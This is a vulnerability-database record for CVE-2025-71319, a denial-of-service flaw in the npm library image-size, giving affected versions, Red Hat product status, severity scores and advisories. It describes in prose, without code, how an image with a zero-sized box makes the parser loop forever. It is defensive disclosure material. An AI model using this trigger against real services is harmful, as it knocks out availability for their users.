Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-71319 (GCVE-0-2025-71319)
Vulnerability from cvelistv5 – Published: 2026-06-09 19:57 – Updated: 2026-07-10 12:05 X_Open Source Unsupported When Assigned- CWE-835 - Loop with Unreachable Exit Condition ('Infinite Loop')
| URL | Tags |
|---|---|
| https://joshua.hu/image-size-infinite-loop-dos-vu… | technical-descriptionexploit |
| https://web.archive.org/web/20260224152152/https:… | issue-tracking |
| https://www.vulncheck.com/advisories/image-size-d… | third-party-advisory |
| https://access.redhat.com/security/cve/CVE-2025-71319 | vdb-entryx_refsource_REDHAT |
| https://bugzilla.redhat.com/show_bug.cgi?id=2487296 | issue-trackingx_refsource_REDHAT |
| https://security.access.redhat.com/data/csaf/v2/v… | x_sadp-csaf-vex |
| https://access.redhat.com/errata/RHSA-2026:33313 | vendor-advisoryx_refsource_REDHAT |
| https://access.redhat.com/errata/RHSA-2026:37272 | vendor-advisoryx_refsource_REDHAT |
| Vendor | Product | Version | |
|---|---|---|---|
| image-size | image-size |
Affected:
1.1.0 , ≤ 1.2.1
(semver)
Affected: 2.0.0 , ≤ 2.0.2 (semver) |
|
| Red Hat | Red Hat Discovery 2 |
cpe:/a:redhat:discovery:2::el9 |
|
| Red Hat | Red Hat Trusted Artifact Signer 1.4 |
cpe:/a:redhat:trusted_artifact_signer:1.4::el9 |
|
| Red Hat | Gatekeeper 3 |
cpe:/a:redhat:gatekeeper:3 |
|
| Red Hat | Red Hat Build of Podman Desktop |
cpe:/a:redhat:podman_desktop:1 |
|
| Red Hat | Red Hat Enterprise Linux 7 |
cpe:/o:redhat:enterprise_linux:7 |
|
| Red Hat | Red Hat Enterprise Linux 8 |
cpe:/o:redhat:enterprise_linux:8 |
|
| Red Hat | Red Hat Fuse 7 |
cpe:/a:redhat:jboss_fuse:7 |
|
| Red Hat | Red Hat JBoss Enterprise Application Platform 7 |
cpe:/a:redhat:jboss_enterprise_application_platform:7 |
|
| Red Hat | Red Hat JBoss Enterprise Application Platform 8 |
cpe:/a:redhat:jboss_enterprise_application_platform:8 |
|
| Red Hat | Red Hat JBoss Enterprise Application Platform Expansion Pack |
cpe:/a:redhat:jbosseapxp |
|
| Red Hat | Red Hat OpenShift AI (RHOAI) |
cpe:/a:redhat:openshift_ai |
|
| Red Hat | Red Hat OpenShift Dev Spaces |
cpe:/a:redhat:openshift_devspaces:3 |
|
| Red Hat | Red Hat Satellite 6 |
cpe:/a:redhat:satellite:6 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-71319",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-10T15:28:34.029349Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-10T16:32:56.781Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
{
"cpes": [
"cpe:/a:redhat:discovery:2::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Discovery 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:trusted_artifact_signer:1.4::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Trusted Artifact Signer 1.4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:gatekeeper:3"
],
"defaultStatus": "affected",
"product": "Gatekeeper 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:podman_desktop:1"
],
"defaultStatus": "affected",
"product": "Red Hat Build of Podman Desktop",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_fuse:7"
],
"defaultStatus": "unaffected",
"product": "Red Hat Fuse 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7"
],
"defaultStatus": "unaffected",
"product": "Red Hat JBoss Enterprise Application Platform 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:8"
],
"defaultStatus": "unaffected",
"product": "Red Hat JBoss Enterprise Application Platform 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jbosseapxp"
],
"defaultStatus": "unaffected",
"product": "Red Hat JBoss Enterprise Application Platform Expansion Pack",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai"
],
"defaultStatus": "unaffected",
"product": "Red Hat OpenShift AI (RHOAI)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_devspaces:3"
],
"defaultStatus": "unaffected",
"product": "Red Hat OpenShift Dev Spaces",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:satellite:6"
],
"defaultStatus": "unaffected",
"product": "Red Hat Satellite 6",
"vendor": "Red Hat"
}
],
"datePublic": "2026-06-09T19:57:16.125Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in image-size. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by supplying specially crafted JXL, HEIF, or JP2 image files that contain zero-sized boxes. The `findBox` function, responsible for image validation, enters an infinite loop when processing these malicious files, leading to an application hang. This can disrupt the availability of services relying on the image-size component."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-835",
"description": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-10T12:05:42.627Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2025-71319"
},
{
"name": "RHBZ#2487296",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487296"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2025/cve-2025-71319.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:33313: Red Hat Discovery 2"
},
{
"lang": "en",
"value": "RHSA-2026:37272: Red Hat Trusted Artifact Signer 1.4"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-06-09T21:01:11.339Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-06-09T19:57:16.125Z",
"value": "Made public."
}
],
"title": "image-size: image-size: Denial of Service due to infinite loop when processing specially crafted images.",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageURL": "pkg:npm/image-size",
"product": "image-size",
"repo": "https://github.com/image-size/image-size",
"vendor": "image-size",
"versions": [
{
"lessThanOrEqual": "1.2.1",
"status": "affected",
"version": "1.1.0",
"versionType": "semver"
},
{
"lessThanOrEqual": "2.0.2",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Joshua Rogers (@MegaManSec)"
}
],
"datePublic": "2025-04-18T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "image-size through 2.0.2 contains a denial of service vulnerability that allows remote attackers to permanently block the Node.js event loop by supplying a specially crafted image buffer with a zero-valued size field in a recognized box-type. Attackers can trigger an infinite loop in the JXL or HEIF image parsers by providing a crafted image containing a box with a size of zero, causing the offset to never advance and permanently hanging the application."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-835",
"description": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-23T16:13:35.342Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"technical-description",
"exploit"
],
"url": "https://joshua.hu/image-size-infinite-loop-dos-vulnerabilities"
},
{
"tags": [
"issue-tracking"
],
"url": "https://web.archive.org/web/20260224152152/https://github.com/image-size/image-size/pull/439"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/image-size-denial-of-service-via-infinite-loop-in-jxl-heif-parser"
}
],
"source": {
"discovery": "EXTERNAL"
},
"tags": [
"x_open-source",
"unsupported-when-assigned"
],
"title": "image-size 2.0.2 Denial of Service via Infinite Loop in JXL/HEIF Parser",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-71319",
"datePublished": "2026-06-09T19:57:16.125Z",
"dateReserved": "2026-06-08T20:44:31.209Z",
"dateUpdated": "2026-07-10T12:05:42.627Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2025-71319",
"date": "2026-07-10",
"epss": "0.00625",
"percentile": "0.45758"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2025-71319\",\"sourceIdentifier\":\"disclosure@vulncheck.com\",\"published\":\"2026-06-09T21:17:03.153\",\"lastModified\":\"2026-07-10T12:16:27.627\",\"vulnStatus\":\"Modified\",\"cveTags\":[{\"sourceIdentifier\":\"disclosure@vulncheck.com\",\"tags\":[\"unsupported-when-assigned\"]}],\"descriptions\":[{\"lang\":\"en\",\"value\":\"image-size through 2.0.2 contains a denial of service vulnerability that allows remote attackers to permanently block the Node.js event loop by supplying a specially crafted image buffer with a zero-valued size field in a recognized box-type. Attackers can trigger an infinite loop in the JXL or HEIF image parsers by providing a crafted image containing a box with a size of zero, causing the offset to never advance and permanently hanging the application.\"}],\"affected\":[{\"source\":\"disclosure@vulncheck.com\",\"affectedData\":[{\"vendor\":\"image-size\",\"product\":\"image-size\",\"defaultStatus\":\"unaffected\",\"repo\":\"https://github.com/image-size/image-size\",\"packageURL\":\"pkg:npm/image-size\",\"versions\":[{\"version\":\"1.1.0\",\"lessThanOrEqual\":\"1.2.1\",\"versionType\":\"semver\",\"status\":\"affected\"},{\"version\":\"2.0.0\",\"lessThanOrEqual\":\"2.0.2\",\"versionType\":\"semver\",\"status\":\"affected\"}]}]},{\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\",\"affectedData\":[{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Discovery 2\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:discovery:2::el9\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Trusted Artifact Signer 1.4\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:trusted_artifact_signer:1.4::el9\"]},{\"vendor\":\"Red Hat\",\"product\":\"Gatekeeper 3\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:gatekeeper:3\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Build of Podman Desktop\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:podman_desktop:1\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux 7\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/o:redhat:enterprise_linux:7\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Enterprise Linux 8\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/o:redhat:enterprise_linux:8\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Fuse 7\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:jboss_fuse:7\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat JBoss Enterprise Application Platform 7\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:jboss_enterprise_application_platform:7\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat JBoss Enterprise Application Platform 8\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:jboss_enterprise_application_platform:8\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat JBoss Enterprise Application Platform Expansion Pack\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:jbosseapxp\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat OpenShift AI (RHOAI)\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:openshift_ai\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat OpenShift Dev Spaces\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:openshift_devspaces:3\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Satellite 6\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:satellite:6\"]}]}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"disclosure@vulncheck.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"disclosure@vulncheck.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}],\"ssvcV203\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"ssvcData\":{\"timestamp\":\"2026-06-10T15:28:34.029349Z\",\"id\":\"CVE-2025-71319\",\"options\":[{\"exploitation\":\"poc\"},{\"automatable\":\"yes\"},{\"technicalImpact\":\"partial\"}],\"role\":\"CISA Coordinator\",\"version\":\"2.0.3\"}}]},\"weaknesses\":[{\"source\":\"disclosure@vulncheck.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-835\"}]},{\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-835\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:image-size:image-size:*:*:*:*:*:node.js:*:*\",\"versionEndIncluding\":\"2.0.2\",\"matchCriteriaId\":\"2C492D20-9B07-48FC-A690-C40D64911E7B\"}]}]}],\"references\":[{\"url\":\"https://joshua.hu/image-size-infinite-loop-dos-vulnerabilities\",\"source\":\"disclosure@vulncheck.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://web.archive.org/web/20260224152152/https://github.com/image-size/image-size/pull/439\",\"source\":\"disclosure@vulncheck.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://www.vulncheck.com/advisories/image-size-denial-of-service-via-infinite-loop-in-jxl-heif-parser\",\"source\":\"disclosure@vulncheck.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:33313\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:37272\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/security/cve/CVE-2025-71319\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://bugzilla.redhat.com/show_bug.cgi?id=2487296\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://security.access.redhat.com/data/csaf/v2/vex/2025/cve-2025-71319.json\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"}]}}",
"redhat_vex": {
"aggregate_severity": "Important",
"current_release_date": "2026-07-10T16:14:53+00:00",
"cve": "CVE-2025-71319",
"id": "CVE-2025-71319",
"initial_release_date": "2025-01-01T00:00:00+00:00",
"product_status:fixed": "3",
"product_status:known_affected": "28",
"product_status:known_not_affected": "34",
"source": "Red Hat CSAF VEX",
"status": "final",
"title": "image-size: image-size: Denial of Service due to infinite loop when processing specially crafted images.",
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2025/cve-2025-71319.json",
"version": "3"
},
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"image-size: image-size: Denial of Service due to infinite loop when processing specially crafted images.\", \"metrics\": [{\"other\": {\"type\": \"Red Hat severity rating\", \"content\": {\"value\": \"Important\", \"namespace\": \"https://access.redhat.com/security/updates/classification/\"}}}, {\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"cpes\": [\"cpe:/a:redhat:discovery:2::el9\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Discovery 2\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:trusted_artifact_signer:1.4::el9\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Trusted Artifact Signer 1.4\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:gatekeeper:3\"], \"vendor\": \"Red Hat\", \"product\": \"Gatekeeper 3\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:podman_desktop:1\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Build of Podman Desktop\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/o:redhat:enterprise_linux:7\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Enterprise Linux 7\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/o:redhat:enterprise_linux:8\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Enterprise Linux 8\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:jboss_fuse:7\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Fuse 7\", \"defaultStatus\": \"unaffected\"}, {\"cpes\": [\"cpe:/a:redhat:jboss_enterprise_application_platform:7\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat JBoss Enterprise Application Platform 7\", \"defaultStatus\": \"unaffected\"}, {\"cpes\": [\"cpe:/a:redhat:jboss_enterprise_application_platform:8\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat JBoss Enterprise Application Platform 8\", \"defaultStatus\": \"unaffected\"}, {\"cpes\": [\"cpe:/a:redhat:jbosseapxp\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat JBoss Enterprise Application Platform Expansion Pack\", \"defaultStatus\": \"unaffected\"}, {\"cpes\": [\"cpe:/a:redhat:openshift_ai\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat OpenShift AI (RHOAI)\", \"defaultStatus\": \"unaffected\"}, {\"cpes\": [\"cpe:/a:redhat:openshift_devspaces:3\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat OpenShift Dev Spaces\", \"defaultStatus\": \"unaffected\"}, {\"cpes\": [\"cpe:/a:redhat:satellite:6\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Satellite 6\", \"defaultStatus\": \"unaffected\"}], \"timeline\": [{\"lang\": \"en\", \"time\": \"2026-06-09T21:01:11.339Z\", \"value\": \"Reported to Red Hat.\"}, {\"lang\": \"en\", \"time\": \"2026-06-09T19:57:16.125Z\", \"value\": \"Made public.\"}], \"solutions\": [{\"lang\": \"en\", \"value\": \"RHSA-2026:33313: Red Hat Discovery 2\"}, {\"lang\": \"en\", \"value\": \"RHSA-2026:37272: Red Hat Trusted Artifact Signer 1.4\"}], \"x_adpType\": \"supplier\", \"datePublic\": \"2026-06-09T19:57:16.125Z\", \"references\": [{\"url\": \"https://access.redhat.com/security/cve/CVE-2025-71319\", \"tags\": [\"vdb-entry\", \"x_refsource_REDHAT\"]}, {\"url\": \"https://bugzilla.redhat.com/show_bug.cgi?id=2487296\", \"name\": \"RHBZ#2487296\", \"tags\": [\"issue-tracking\", \"x_refsource_REDHAT\"]}, {\"url\": \"https://security.access.redhat.com/data/csaf/v2/vex/2025/cve-2025-71319.json\", \"tags\": [\"x_sadp-csaf-vex\"]}, {\"url\": \"https://access.redhat.com/errata/RHSA-2026:33313\", \"tags\": [\"vendor-advisory\", \"x_refsource_REDHAT\"]}, {\"url\": \"https://access.redhat.com/errata/RHSA-2026:37272\", \"tags\": [\"vendor-advisory\", \"x_refsource_REDHAT\"]}], \"workarounds\": [{\"lang\": \"en\", \"value\": \"Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.\"}], \"x_generator\": {\"engine\": \"sadp-cli 1.0.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"A flaw was found in image-size. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by supplying specially crafted JXL, HEIF, or JP2 image files that contain zero-sized boxes. The `findBox` function, responsible for image validation, enters an infinite loop when processing these malicious files, leading to an application hang. This can disrupt the availability of services relying on the image-size component.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-835\", \"description\": \"Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\", \"shortName\": \"redhat-SADP\", \"dateUpdated\": \"2026-07-10T12:05:42.627Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-71319\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-10T15:28:34.029349Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-10T15:40:04.803Z\"}}], \"cna\": {\"tags\": [\"x_open-source\", \"unsupported-when-assigned\"], \"title\": \"image-size 2.0.2 Denial of Service via Infinite Loop in JXL/HEIF Parser\", \"source\": {\"discovery\": \"EXTERNAL\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"Joshua Rogers (@MegaManSec)\"}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV4_0\": {\"Safety\": \"NOT_DEFINED\", \"version\": \"4.0\", \"Recovery\": \"NOT_DEFINED\", \"baseScore\": 8.7, \"Automatable\": \"NOT_DEFINED\", \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"valueDensity\": \"NOT_DEFINED\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N\", \"exploitMaturity\": \"NOT_DEFINED\", \"providerUrgency\": \"NOT_DEFINED\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\", \"vulnerabilityResponseEffort\": \"NOT_DEFINED\"}, \"scenarios\": 